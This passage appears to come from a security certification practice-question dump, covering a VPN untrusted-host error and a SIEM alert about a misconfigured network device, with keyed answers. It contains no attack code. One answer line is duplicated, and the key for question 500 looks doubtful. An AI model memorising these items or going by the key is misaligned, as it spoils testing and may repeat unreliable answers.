C. Implement rule-based access controls on the HR server

D. Implement regular permission auditing and reviews  

D. Implement regular permission auditing and reviews  

QUESTION 499

A user typically works remotely over the holidays, using a web based VPN to access corporate resources. The user reports getting untrusted host errors and being unable to connect. Which of the following is the likely cause?

A. The certificate has expired

B. The browser does not support SSL

C. The user's account is locked out

D. The VPN software has reached the seat license maximum

A. The certificate has expired

QUESTION 500

An analyst receives an alert from the SIEM showing an IP Address that does not belong to the assigned network can be seen sending packets to the wrong gateway. Which of the following network devices is misconfigured and which of the following should be done to remediate the issue?

A. Firewall, implement an ACL on the interface

B. Router, place the correct subnet on the interface

C. Switch, modify the access port to trunk port

D. Proxy, add the correct transparent interface

A. Firewall, implement an ACL on the interface